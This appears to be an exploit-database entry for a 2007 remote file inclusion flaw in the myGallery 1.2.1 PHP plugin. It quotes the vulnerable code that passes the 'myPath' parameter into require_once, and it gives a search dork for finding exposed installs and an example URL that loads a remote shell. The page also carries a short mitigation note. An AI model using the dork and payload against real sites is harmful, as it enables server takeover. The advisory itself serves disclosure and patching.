header-logo
Suggest Exploit
vendor:
myGallery
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: myGallery
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

myGallery 1.2.1 Remote File Include Vulnerability

The myGallery 1.2.1 script is vulnerable to a remote file inclusion vulnerability. This vulnerability allows an attacker to include and execute arbitrary remote files on the server.

Mitigation:

The vendor should release a patch or update to fix the vulnerability. Users are advised to update to the latest version of the myGallery script. Additionally, webmasters should implement proper input validation and filtering to prevent remote file inclusion vulnerabilities.
Source

Exploit-DB raw data:

AAAAAAAAA AAAAAAAA  AAA   AAA    AAA      AAAAAAAA   
AAAAAAAAA AAAAAAAAA AAA   AAA   AAAAA    AAAAAAAAAA  
   AAA    AAA   AAA  AAA AAA   AAAAAAA  AAA       
   AAA    AAAAAAAAA   AAAAA   AAA   AAA AAA     AAAAA
   AAA    AAAAAAAA     AAA    AAA   AAA AAA     AAAAA
   AAA    AAA AAA      AAA    AAAAAAAAA AAA      AAA  
   AAA    AAA  AAA     AAA    AAA   AAA  AAAAAAAAAA    
   AAA    AAA   AAA    AAA    AAA   AAA   AAAAAAAA     


# myGallery 1.2.1(myPath)Remote File Include Vulnerablity
# Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code 
#########################################################
# if (!$_POST){
# 	$mypath=$_GET['myPath']; <---------[+]
# 
# }
# else {
# 	$mypath=$_POST['myPath'];<---------[+]
# 	
# 	
# }
# require_once($mypath.'/wp-config.php');<---------[+]
########################################################
# Dork : 
# inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php
# Ex:
# [Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell
# Sp.Thanx = Tryag-Team

# milw0rm.com [2007-04-29]

Navigation

Suggest Exploit

Services By CQR